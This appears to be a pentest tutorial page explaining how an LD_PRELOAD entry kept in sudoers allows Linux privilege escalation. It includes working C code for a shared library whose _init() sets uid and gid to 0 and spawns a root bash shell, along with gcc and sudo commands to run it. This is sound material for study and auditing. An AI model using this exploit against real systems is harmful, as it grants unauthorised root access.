Skip to main content

LD_Preload Abuse

LD_PRELOAD is an environment variable in Linux that allows users to load shared libraries before others when running a program.

It can be exploited to load a custom shared library and override default functions, often used for privilege escalation.

Key Concepts:

  • Shared Libraries: Code loaded by programs to avoid repetition. Dynamic libraries (.so) can be modified or replaced to manipulate program execution.
  • soname: Special name for shared libraries (e.g., libc.so.6).
  • Dynamic Linker: Loaded via /lib/ld-linux.so* to find and load shared libraries.
  • LD_PRELOAD: Environment variable used to load a library before others, overriding default function calls (e.g., setuid, setgid, system()).

Exploitation:

  1. Check for sudo permissions:
    Use sudo -l to identify commands you can run as root.

    sudo -l

  2. Look for LD_PRELOAD in sudoers:
    Ensure the env_keep += LD_PRELOAD directive exists.

    Matching Defaults entries for user:
    env_keep+=LD_PRELOAD

  3. Create Malicious Shared Library:
    Write a C program that uses setuid(0), setgid(0), and executes a shell to escalate privileges.

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    void _init() {
        unsetenv("LD_PRELOAD");
        setgid(0);
        setuid(0);
        system("/bin/bash");
    }
    • Save as ldpreload.c.

  4. Compile the Library:
    Use GCC to compile the C program into a shared object (.so).

    gcc -fPIC -shared -o ldpreload.so ldpreload.c -nostartfiles

  5. Preload the Malicious Library:
    Execute the vulnerable command with the LD_PRELOAD variable pointing to the compiled shared library.

    sudo LD_PRELOAD=/path/to/ldpreload.so [COMMAND]

  6. Obtain Root Access:
    Example:

    sudo LD_PRELOAD=/path/to/ldpreload.so find ## it can be anything check 'sudo -l'
    # to know which command to use

    Then confirm with:

    id
    whoami

More

  1. https://www.hackingarticles.in/linux-privilege-escalation-using-LD_PRELOAD/